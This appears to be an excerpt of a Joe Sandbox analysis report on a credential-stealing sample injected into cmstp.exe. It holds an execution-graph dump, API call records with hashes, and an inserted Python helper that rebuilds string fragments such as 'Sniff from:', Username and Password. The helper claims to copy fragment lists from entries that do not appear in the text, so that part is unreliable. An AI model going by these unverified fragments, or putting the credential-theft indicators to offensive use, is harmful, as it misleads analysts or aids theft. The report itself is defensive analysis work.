                                          Uniqueness

                                          Uniqueness Score: -1.00%
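The String ID fields of the entries above list 4-character pieces such as kern, el32 and .dll rather than whole names, which is the shape left behind when code assembles a string from 4-byte immediates instead of referencing it from a data section. As an added example that is not part of the Joe Sandbox report, the following script takes fragment lists copied verbatim from the entries above and checks which candidate strings can be tiled from them. The 4-byte chunk width, the candidate dictionary and the reading of the auth/logi/pass/user entry as 4-byte prefix compares are assumptions of this script, not statements made by the report.

```python
"""Reassemble candidate strings from the per-function String ID fragments.

Added example, not part of the Joe Sandbox report or the analysed sample.
STRING_IDS values are copied verbatim from the entries above; the chunk
width, the candidate list and the prefix-compare interpretation are assumptions.
"""
from collections import Counter

# Copied from the "String ID" fields of the entries above (keyed by API String ID).
STRING_IDS = {
    "0-393284711": ".dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini",
    "0-3434893486": "$Snif$f fr$om:",
    "0-2058692283": "UR$2$L: $Pass$User$name$word",
    "0-3136806129": ".dll$chro$hild$me_c",
    "0-319646191": "User-Agent: $nt: $on.d$urlmon.dll",
    "0-2393853802": "auth$logi$pass$user",
}

# Assumed: 32-bit code builds these strings from 4-byte immediates, so a
# string shows up as 4-char pieces plus a shorter tail.
CHUNK = 4

# Assumed candidate dictionary; extend it with whatever the analyst expects.
CANDIDATES = [
    "kernel32.dll", "user32.dll", "wininet.dll", "urlmon.dll", "chrome_child.dll",
    "Sniff from:", "Username", "Password", "User-Agent: ",
    "login", "password", "username",
]


def fragments(string_id: str) -> Counter:
    """Multiset of fragments. The report joins them with '$', so a literal '$'
    inside a fragment cannot be told apart from the separator."""
    return Counter(f for f in string_id.split("$") if f)


def chunks(s: str, width: int = CHUNK) -> list[str]:
    """Split s into width-sized pieces; the last piece may be shorter."""
    return [s[i:i + width] for i in range(0, len(s), width)]


def tiles(candidate: str, frags: Counter, width: int = CHUNK) -> bool:
    """True if candidate is listed whole, or every chunk of it is available in
    frags with sufficient multiplicity (comparison is case-sensitive)."""
    if frags[candidate]:
        return True
    need = Counter(chunks(candidate, width))
    return all(frags[piece] >= n for piece, n in need.items())


def reassemble(string_id: str, candidates=CANDIDATES) -> list[str]:
    """Candidates fully recoverable from one function's fragment list."""
    frags = fragments(string_id)
    return [c for c in candidates if tiles(c, frags)]


def prefix_hits(string_id: str, candidates=CANDIDATES, width: int = CHUNK) -> dict:
    """Fragments of exactly `width` chars that start a candidate without tiling
    it: the shape a 4-byte compare against a field name would leave behind."""
    frags = fragments(string_id)
    hits = {}
    for frag in frags:
        if len(frag) != width:
            continue
        starts = [c for c in candidates
                  if c.startswith(frag) and not tiles(c, frags, width)]
        if starts:
            hits[frag] = starts
    return hits


def report(string_ids=STRING_IDS) -> dict:
    """Map each API String ID to the strings reassembled from its fragments."""
    return {key: reassemble(value) for key, value in string_ids.items()}


if __name__ == "__main__":
    for key, found in report().items():
        print(key, found or prefix_hits(STRING_IDS[key]))
```

Whole strings that the plugin lists verbatim (User-Agent: , urlmon.dll) match directly; the others only match when every 4-byte piece is present, which is why the lowercase user fragment does not reassemble Username and why the auth/logi/pass/user entry yields prefix hits rather than complete strings.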

                                          Execution Graph

                                          Execution Coverage:2%
                                          Dynamic/Decrypted Code Coverage:1.7%
                                          Signature Coverage:0%
                                          Total number of Nodes:591
                                          Total number of Limit Nodes:72
execution_graph: node and edge data for the report's interactive graph viewer (node ids paired with function addresses such as af09d, ab990, 99d30, 98f30; edge lists between them; and API annotations on some nodes, including LdrLoadDll, NtClose, NtReadFile and LdrInitializeThunk). The raw edge list is only meaningful inside the viewer and is not reproduced here.
83402 aaec0 LdrLoadDll 83171->83402 83318 aad30 83172->83318 83175 ab208 83397 a9e80 83175->83397 83179 a9edc 83178->83179 83180 aaf20 LdrLoadDll 83178->83180 83429 1ebfae8 LdrInitializeThunk 83179->83429 83180->83179 83181 a9ef7 83183 abd80 83181->83183 83184 ab319 83183->83184 83430 aa630 83183->83430 83184->83062 83187 a4b34 83186->83187 83188 aaf20 LdrLoadDll 83186->83188 83187->83126 83187->83127 83187->83130 83188->83187 83190 aaf20 LdrLoadDll 83189->83190 83191 aa33c NtCreateFile 83190->83191 83191->83131 83193 a46fc 83192->83193 83194 aa2a0 LdrLoadDll 83193->83194 83195 a471d 83194->83195 83196 a4738 83195->83196 83197 a4724 83195->83197 83199 aa450 2 API calls 83196->83199 83198 aa450 2 API calls 83197->83198 83200 a472d 83198->83200 83201 a4741 83199->83201 83200->83155 83256 abf90 LdrLoadDll RtlAllocateHeap 83201->83256 83203 a474c 83203->83155 83205 a444b 83204->83205 83206 a447e 83204->83206 83207 aa2a0 LdrLoadDll 83205->83207 83208 a45c9 83206->83208 83211 a449a 83206->83211 83209 a4466 83207->83209 83210 aa2a0 LdrLoadDll 83208->83210 83212 aa450 2 API calls 83209->83212 83216 a45e4 83210->83216 83213 aa2a0 LdrLoadDll 83211->83213 83214 a446f 83212->83214 83215 a44b5 83213->83215 83214->83158 83218 a44bc 83215->83218 83219 a44d1 83215->83219 83270 aa2e0 LdrLoadDll 83216->83270 83221 aa450 2 API calls 83218->83221 83222 a44ec 83219->83222 83223 a44d6 83219->83223 83220 a461e 83224 aa450 2 API calls 83220->83224 83225 a44c5 83221->83225 83231 a44f1 83222->83231 83257 abf50 83222->83257 83226 aa450 2 API calls 83223->83226 83227 a4629 83224->83227 83225->83158 83228 a44df 83226->83228 83227->83158 83228->83158 83240 a4503 83231->83240 83260 aa3d0 83231->83260 83232 a4557 83233 a456e 83232->83233 83269 aa260 LdrLoadDll 83232->83269 83235 a458a 83233->83235 83236 a4575 83233->83236 83237 aa450 2 API calls 83235->83237 83238 aa450 2 API calls 83236->83238 83239 a4593 83237->83239 83238->83240 83241 a45bf 83239->83241 83264 abb50 83239->83264 83240->83158 
83241->83158 83243 a45aa 83244 abd80 2 API calls 83243->83244 83245 a45b3 83244->83245 83245->83158 83246->83130 83247->83151 83249 aaf20 LdrLoadDll 83248->83249 83250 a4d04 83249->83250 83251 aa2e0 LdrLoadDll 83250->83251 83251->83154 83253 aa46c NtClose 83252->83253 83254 aaf20 LdrLoadDll 83252->83254 83253->83159 83254->83253 83255->83139 83256->83203 83259 abf68 83257->83259 83271 aa5f0 83257->83271 83259->83231 83261 aa3da 83260->83261 83262 aaf20 LdrLoadDll 83261->83262 83263 aa3ec NtReadFile 83262->83263 83263->83232 83265 abb5d 83264->83265 83266 abb74 83264->83266 83265->83266 83267 abf50 2 API calls 83265->83267 83266->83243 83268 abb8b 83267->83268 83268->83243 83269->83233 83270->83220 83272 aaf20 LdrLoadDll 83271->83272 83273 aa60c RtlAllocateHeap 83272->83273 83273->83259 83275 abd2d 83274->83275 83403 aa500 83274->83403 83275->83164 83278 a4063 83277->83278 83307 a4071 83278->83307 83406 acef0 83278->83406 83280 a40cd 83281 acef0 2 API calls 83280->83281 83284 a40d8 83281->83284 83282 a4126 83285 acef0 2 API calls 83282->83285 83284->83282 83286 ad020 3 API calls 83284->83286 83421 acf90 LdrLoadDll RtlAllocateHeap RtlFreeHeap 83284->83421 83288 a413a 83285->83288 83286->83284 83287 a4197 83289 acef0 2 API calls 83287->83289 83288->83287 83411 ad020 83288->83411 83291 a41ad 83289->83291 83292 a41ea 83291->83292 83295 ad020 3 API calls 83291->83295 83293 acef0 2 API calls 83292->83293 83294 a41f5 83293->83294 83296 ad020 3 API calls 83294->83296 83302 a422f 83294->83302 83295->83291 83296->83294 83299 acf50 2 API calls 83300 a432e 83299->83300 83301 acf50 2 API calls 83300->83301 83303 a4338 83301->83303 83417 acf50 83302->83417 83304 acf50 2 API calls 83303->83304 83305 a4342 83304->83305 83306 acf50 2 API calls 83305->83306 83306->83307 83307->83167 83309 a5391 83308->83309 83310 a4a40 8 API calls 83309->83310 83311 a53a7 83310->83311 83312 a53e2 83311->83312 83313 a53f5 83311->83313 83317 a53fa 83311->83317 83314 abd80 2 API calls 83312->83314 83315 
abd80 2 API calls 83313->83315 83316 a53e7 83314->83316 83315->83317 83316->83171 83317->83171 83319 aad44 83318->83319 83320 aabf0 LdrLoadDll 83318->83320 83422 aabf0 83319->83422 83320->83319 83323 aabf0 LdrLoadDll 83324 aad56 83323->83324 83325 aabf0 LdrLoadDll 83324->83325 83326 aad5f 83325->83326 83327 aabf0 LdrLoadDll 83326->83327 83328 aad68 83327->83328 83329 aabf0 LdrLoadDll 83328->83329 83330 aad71 83329->83330 83331 aabf0 LdrLoadDll 83330->83331 83332 aad7d 83331->83332 83333 aabf0 LdrLoadDll 83332->83333 83334 aad86 83333->83334 83335 aabf0 LdrLoadDll 83334->83335 83336 aad8f 83335->83336 83337 aabf0 LdrLoadDll 83336->83337 83338 aad98 83337->83338 83339 aabf0 LdrLoadDll 83338->83339 83340 aada1 83339->83340 83341 aabf0 LdrLoadDll 83340->83341 83342 aadaa 83341->83342 83343 aabf0 LdrLoadDll 83342->83343 83344 aadb6 83343->83344 83345 aabf0 LdrLoadDll 83344->83345 83346 aadbf 83345->83346 83347 aabf0 LdrLoadDll 83346->83347 83348 aadc8 83347->83348 83349 aabf0 LdrLoadDll 83348->83349 83350 aadd1 83349->83350 83351 aabf0 LdrLoadDll 83350->83351 83352 aadda 83351->83352 83353 aabf0 LdrLoadDll 83352->83353 83354 aade3 83353->83354 83355 aabf0 LdrLoadDll 83354->83355 83356 aadef 83355->83356 83357 aabf0 LdrLoadDll 83356->83357 83358 aadf8 83357->83358 83359 aabf0 LdrLoadDll 83358->83359 83360 aae01 83359->83360 83361 aabf0 LdrLoadDll 83360->83361 83362 aae0a 83361->83362 83363 aabf0 LdrLoadDll 83362->83363 83364 aae13 83363->83364 83365 aabf0 LdrLoadDll 83364->83365 83366 aae1c 83365->83366 83367 aabf0 LdrLoadDll 83366->83367 83368 aae28 83367->83368 83369 aabf0 LdrLoadDll 83368->83369 83370 aae31 83369->83370 83371 aabf0 LdrLoadDll 83370->83371 83372 aae3a 83371->83372 83373 aabf0 LdrLoadDll 83372->83373 83374 aae43 83373->83374 83375 aabf0 LdrLoadDll 83374->83375 83376 aae4c 83375->83376 83377 aabf0 LdrLoadDll 83376->83377 83378 aae55 83377->83378 83379 aabf0 LdrLoadDll 83378->83379 83380 aae61 83379->83380 83381 aabf0 LdrLoadDll 83380->83381 83382 aae6a 
83381->83382 83383 aabf0 LdrLoadDll 83382->83383 83384 aae73 83383->83384 83385 aabf0 LdrLoadDll 83384->83385 83386 aae7c 83385->83386 83387 aabf0 LdrLoadDll 83386->83387 83388 aae85 83387->83388 83389 aabf0 LdrLoadDll 83388->83389 83390 aae8e 83389->83390 83391 aabf0 LdrLoadDll 83390->83391 83392 aae9a 83391->83392 83393 aabf0 LdrLoadDll 83392->83393 83394 aaea3 83393->83394 83395 aabf0 LdrLoadDll 83394->83395 83396 aaeac 83395->83396 83396->83175 83398 aaf20 LdrLoadDll 83397->83398 83399 a9e9c 83398->83399 83428 1ebfdc0 LdrInitializeThunk 83399->83428 83400 a9eb3 83400->83095 83402->83172 83404 aaf20 LdrLoadDll 83403->83404 83405 aa51c NtAllocateVirtualMemory 83404->83405 83405->83275 83407 acf00 83406->83407 83408 acf06 83406->83408 83407->83280 83409 abf50 2 API calls 83408->83409 83410 acf2c 83409->83410 83410->83280 83412 acf90 83411->83412 83413 abf50 2 API calls 83412->83413 83416 acfed 83412->83416 83414 acfca 83413->83414 83415 abd80 2 API calls 83414->83415 83415->83416 83416->83288 83418 acf56 83417->83418 83419 abd80 2 API calls 83418->83419 83420 a4324 83419->83420 83420->83299 83421->83284 83423 aac0b 83422->83423 83424 a4e40 LdrLoadDll 83423->83424 83425 aac2b 83424->83425 83426 a4e40 LdrLoadDll 83425->83426 83427 aacd7 83425->83427 83426->83427 83427->83323 83428->83400 83429->83181 83431 aaf20 LdrLoadDll 83430->83431 83432 aa64c RtlFreeHeap 83431->83432 83432->83184 83434 97eab 83433->83434 83435 97eb0 83433->83435 83434->83103 83436 abd00 2 API calls 83435->83436 83442 97ed5 83436->83442 83437 97f38 83437->83103 83438 a9e80 2 API calls 83438->83442 83439 97f3e 83441 97f64 83439->83441 83443 aa580 2 API calls 83439->83443 83441->83103 83442->83437 83442->83438 83442->83439 83445 abd00 2 API calls 83442->83445 83449 aa580 83442->83449 83444 97f55 83443->83444 83444->83103 83445->83442 83447 9817e 83446->83447 83448 aa580 2 API calls 83446->83448 83447->83064 83448->83447 83450 aa59c 83449->83450 83451 aaf20 LdrLoadDll 83449->83451 83454 1ebfb68 
LdrInitializeThunk 83450->83454 83451->83450 83452 aa5b3 83452->83442 83454->83452 83456 ab583 83455->83456 83459 9ace0 83456->83459 83458 99c4b 83458->83072 83461 9ad04 83459->83461 83460 9ad0b 83460->83458 83461->83460 83462 9ad40 LdrLoadDll 83461->83462 83463 9ad57 83461->83463 83462->83463 83463->83458 83465 9b053 83464->83465 83467 9b0d0 83465->83467 83479 a9c50 LdrLoadDll 83465->83479 83467->83077 83469 aaf20 LdrLoadDll 83468->83469 83470 9f1ab 83469->83470 83470->83080 83471 aa790 83470->83471 83472 aaf20 LdrLoadDll 83471->83472 83473 aa7af LookupPrivilegeValueW 83472->83473 83473->83082 83475 aaf20 LdrLoadDll 83474->83475 83476 aa23c 83475->83476 83480 1ebfed0 LdrInitializeThunk 83476->83480 83477 aa25b 83477->83083 83479->83467 83480->83477 83482 9b1e0 83481->83482 83483 9b030 LdrLoadDll 83482->83483 83484 9b1f4 83483->83484 83484->83017 83486 9af24 83485->83486 83558 a9c50 LdrLoadDll 83486->83558 83488 9af5e 83488->83019 83490 9f39c 83489->83490 83491 9b1b0 LdrLoadDll 83490->83491 83492 9f3ae 83491->83492 83559 9f280 83492->83559 83495 9f3c9 83498 9f3d4 83495->83498 83499 aa450 2 API calls 83495->83499 83496 9f3e1 83497 9f3f2 83496->83497 83500 aa450 2 API calls 83496->83500 83497->83022 83498->83022 83499->83498 83500->83497 83502 9f42c 83501->83502 83578 9b2a0 83502->83578 83504 9f43e 83505 9f280 3 API calls 83504->83505 83506 9f44f 83505->83506 83507 9f459 83506->83507 83509 9f471 83506->83509 83508 aa450 2 API calls 83507->83508 83510 9f464 83507->83510 83508->83510 83511 aa450 2 API calls 83509->83511 83512 9f482 83509->83512 83510->83024 83511->83512 83512->83024 83514 9ca96 83513->83514 83515 9caa0 83513->83515 83514->83033 83516 9af00 LdrLoadDll 83515->83516 83517 9cb3e 83516->83517 83518 9cb64 83517->83518 83519 9b030 LdrLoadDll 83517->83519 83518->83033 83520 9cb80 83519->83520 83521 a4a40 8 API calls 83520->83521 83522 9cbd5 83521->83522 83522->83033 83524 9d636 83523->83524 83525 9b030 LdrLoadDll 83524->83525 83526 9d64a 83525->83526 83582 
9d300 83526->83582 83528 9908b 83529 9cbf0 83528->83529 83530 9cc16 83529->83530 83531 9b030 LdrLoadDll 83530->83531 83532 9cc99 83530->83532 83531->83532 83533 9b030 LdrLoadDll 83532->83533 83534 9cd06 83533->83534 83535 9af00 LdrLoadDll 83534->83535 83536 9cd6f 83535->83536 83537 9b030 LdrLoadDll 83536->83537 83538 9ce1f 83537->83538 83538->83045 83542 98d14 83539->83542 83611 9f6c0 83539->83611 83541 98f25 83541->83002 83542->83541 83616 a4390 83542->83616 83544 98d70 83544->83541 83619 98ab0 83544->83619 83547 acef0 2 API calls 83548 98db2 83547->83548 83549 ad020 3 API calls 83548->83549 83554 98dc7 83549->83554 83550 97ea0 4 API calls 83550->83554 83553 9c7a0 18 API calls 83553->83554 83554->83541 83554->83550 83554->83553 83555 98160 2 API calls 83554->83555 83624 9f660 83554->83624 83628 9f070 21 API calls 83554->83628 83555->83554 83556->83026 83557->83051 83558->83488 83560 9f29a 83559->83560 83568 9f350 83559->83568 83561 9b030 LdrLoadDll 83560->83561 83562 9f2bc 83561->83562 83569 a9f00 83562->83569 83564 9f2fe 83572 a9f40 83564->83572 83567 aa450 2 API calls 83567->83568 83568->83495 83568->83496 83570 a9f1c 83569->83570 83571 aaf20 LdrLoadDll 83569->83571 83570->83564 83571->83570 83573 a9f5c 83572->83573 83574 aaf20 LdrLoadDll 83572->83574 83577 1ec07ac LdrInitializeThunk 83573->83577 83574->83573 83575 9f344 83575->83567 83577->83575 83579 9b2c7 83578->83579 83580 9b030 LdrLoadDll 83579->83580 83581 9b303 83580->83581 83581->83504 83583 9d317 83582->83583 83591 9f700 83583->83591 83585 9d35f 83599 aa6a0 83585->83599 83587 9d38b 83588 9d392 83587->83588 83602 aa260 LdrLoadDll 83587->83602 83588->83528 83590 9d3a5 83590->83528 83592 9f725 83591->83592 83603 981a0 83592->83603 83594 9f749 83594->83585 83595 9f83e 83594->83595 83596 a4a40 8 API calls 83594->83596 83598 abd80 2 API calls 83594->83598 83610 9f540 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 83594->83610 83595->83585 83596->83594 83598->83594 83600 aa6bf CreateProcessInternalW 
83599->83600 83601 aaf20 LdrLoadDll 83599->83601 83600->83587 83601->83600 83602->83590 83604 9829f 83603->83604 83605 981b5 83603->83605 83604->83594 83605->83604 83606 a4a40 8 API calls 83605->83606 83607 98222 83606->83607 83608 abd80 2 API calls 83607->83608 83609 98249 83607->83609 83608->83609 83609->83594 83610->83594 83612 a4e40 LdrLoadDll 83611->83612 83613 9f6df 83612->83613 83614 9f6ed 83613->83614 83615 9f6e6 SetErrorMode 83613->83615 83614->83542 83615->83614 83618 a43b6 83616->83618 83629 9f490 83616->83629 83618->83544 83620 abd00 2 API calls 83619->83620 83622 98ad5 83620->83622 83621 98cea 83621->83547 83622->83621 83649 a9840 83622->83649 83625 9f673 83624->83625 83697 a9e50 83625->83697 83628->83554 83630 9f4ad 83629->83630 83636 a9f80 83630->83636 83633 9f4f5 83633->83618 83637 a9f86 83636->83637 83638 aaf20 LdrLoadDll 83637->83638 83639 a9f9c 83638->83639 83647 1ebffb4 LdrInitializeThunk 83639->83647 83640 9f4ee 83640->83633 83642 a9fd0 83640->83642 83643 aaf20 LdrLoadDll 83642->83643 83644 a9fec 83643->83644 83648 1ebfc60 LdrInitializeThunk 83644->83648 83645 9f51e 83645->83618 83647->83640 83648->83645 83650 abf50 2 API calls 83649->83650 83651 a9857 83650->83651 83670 99310 83651->83670 83653 a9872 83654 a9899 83653->83654 83655 a98b0 83653->83655 83656 abd80 2 API calls 83654->83656 83658 abd00 2 API calls 83655->83658 83657 a98a6 83656->83657 83657->83621 83659 a98ea 83658->83659 83660 abd00 2 API calls 83659->83660 83661 a9903 83660->83661 83667 a9ba4 83661->83667 83676 abd40 LdrLoadDll 83661->83676 83663 a9b89 83664 a9b90 83663->83664 83663->83667 83665 abd80 2 API calls 83664->83665 83666 a9b9a 83665->83666 83666->83621 83668 abd80 2 API calls 83667->83668 83669 a9bf9 83668->83669 83669->83621 83671 99335 83670->83671 83672 9ace0 LdrLoadDll 83671->83672 83673 99368 83672->83673 83675 9938d 83673->83675 83677 9cf10 83673->83677 83675->83653 83676->83663 83678 9cf3c 83677->83678 83679 aa1a0 LdrLoadDll 83678->83679 83680 9cf55 83679->83680 
83681 9cf5c 83680->83681 83688 aa1e0 83680->83688 83681->83675 83685 9cf97 83686 aa450 2 API calls 83685->83686 83687 9cfba 83686->83687 83687->83675 83689 aa1fc 83688->83689 83690 aaf20 LdrLoadDll 83688->83690 83696 1ebfbb8 LdrInitializeThunk 83689->83696 83690->83689 83691 9cf7f 83691->83681 83693 aa7d0 83691->83693 83694 aaf20 LdrLoadDll 83693->83694 83695 aa7ef 83694->83695 83695->83685 83696->83691 83698 aaf20 LdrLoadDll 83697->83698 83699 a9e6c 83698->83699 83702 1ebfd8c LdrInitializeThunk 83699->83702 83700 9f69e 83700->83554 83702->83700 83704 a9040 83705 abd00 2 API calls 83704->83705 83707 a907b 83705->83707 83706 a915c 83707->83706 83708 9ace0 LdrLoadDll 83707->83708 83709 a90b1 83708->83709 83710 a4e40 LdrLoadDll 83709->83710 83712 a90cd 83710->83712 83711 a90e0 Sleep 83711->83712 83712->83706 83712->83711 83715 a8c60 LdrLoadDll 83712->83715 83716 a8e70 LdrLoadDll 83712->83716 83715->83712 83716->83712 83719 1ebf900 LdrInitializeThunk

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 288 aa320-aa371 call aaf20 NtCreateFile
                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,000A4BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000A4BA7,007A002E,00000000,00000060,00000000,00000000), ref: 000AA36D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID: .z`
                                          • API String ID: 823142352-1441809116
                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                          • Instruction ID: 475b9485cd9734b1bc41fdf535602a367b285c484343e64533211baa3957841c
                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                          • Instruction Fuzzy Hash: C1F0BDB2200208AFCB48CF88DC85EEB77ADAF8C754F158248BA0D97241D630E811CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 291 aa3d0-aa419 call aaf20 NtReadFile
                                          APIs
                                          • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!J,FFFFFFFF,?,bM,?,00000000), ref: 000AA415
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: !J
                                          • API String ID: 2738559852-747486036
                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                          • Instruction ID: a30247ae5ba33b1ed46b3f08e5375f1f8ac4613c94c5868431253226c49408ff
                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                          • Instruction Fuzzy Hash: 11F0A4B2200208AFCB18DF89DC81EEB77ADAF8C754F158258BA1D97241D630E811CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 295 aa3ca-aa3cb 296 aa3da-aa419 call aaf20 NtReadFile 295->296 297 aa3cd-aa3ce 295->297 297->296
                                          APIs
                                          • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!J,FFFFFFFF,?,bM,?,00000000), ref: 000AA415
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: !J
                                          • API String ID: 2738559852-747486036
                                          • Opcode ID: 2e2145ff2e341c1d8fca080a0d299258ad6bca4f6bb3881c450b2421b126617c
                                          • Instruction ID: 658f4992cd855cc1aecd724bee42a0b44c2ec61aa739e9793aa49a8dd6c95622
                                          • Opcode Fuzzy Hash: 2e2145ff2e341c1d8fca080a0d299258ad6bca4f6bb3881c450b2421b126617c
                                          • Instruction Fuzzy Hash: BCF0F8B2600108AFDB04DF99DC84EEB73ADEF8D714F158619FA0DA3241D630E815CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 306 aa44a-aa479 call aaf20 NtClose
                                          APIs
                                          • NtClose.NTDLL(@M,?,?,000A4D40,00000000,FFFFFFFF), ref: 000AA475
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID: @M
                                          • API String ID: 3535843008-718900356
                                          • Opcode ID: 79f3a0b871518812defec16c576ec8ac01da623b4bb3b9cf6db8bc9c69869ffc
                                          • Instruction ID: dcce2112a703cca207136a537f5cd14ec8c8c72acacc687d4726c96d1a48fd7e
                                          • Opcode Fuzzy Hash: 79f3a0b871518812defec16c576ec8ac01da623b4bb3b9cf6db8bc9c69869ffc
                                          • Instruction Fuzzy Hash: 6BE08C76200204AFDB20EFA4DC85FD77B28EF49320F104068BA1C9B242D630AA008A90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 309 aa450-aa466 310 aa46c-aa479 NtClose 309->310 311 aa467 call aaf20 309->311 311->310
                                          APIs
                                          • NtClose.NTDLL(@M,?,?,000A4D40,00000000,FFFFFFFF), ref: 000AA475
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID: @M
                                          • API String ID: 3535843008-718900356
                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                          • Instruction ID: 9f48a1c1a4170332db2fcbc85ac7d7b48469cb6b1b0d140592c5c70c00ac018c
                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                          • Instruction Fuzzy Hash: 14D01776200214ABD714EBD8DC85FE77BACEF49760F1544A9BA189B282D630FA0086E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00092D11,00002000,00003000,00000004), ref: 000AA539
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_90000_cmstp.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                          • Instruction ID: f52b4377ada8f1ad56c86a480284727d5bc631dace762f40d7406ab6d5ae597f
                                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                          • Instruction Fuzzy Hash: 6AF015B2200208AFCB18DF89DC81EEB77ADAF88754F118158BE0897241C630F810CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_1ea0000_cmstp.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                          • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                          • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                          • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.879405399.0000000001EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01EA0000, based on PE: true
                                          • Associated: 00000009.00000002.879405399.0000000001EA0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001F90000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA4000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FA7000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000001FB0000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000009.00000002.879405399.0000000002010000.00000040.00001000.00020000.00000000.sdmp
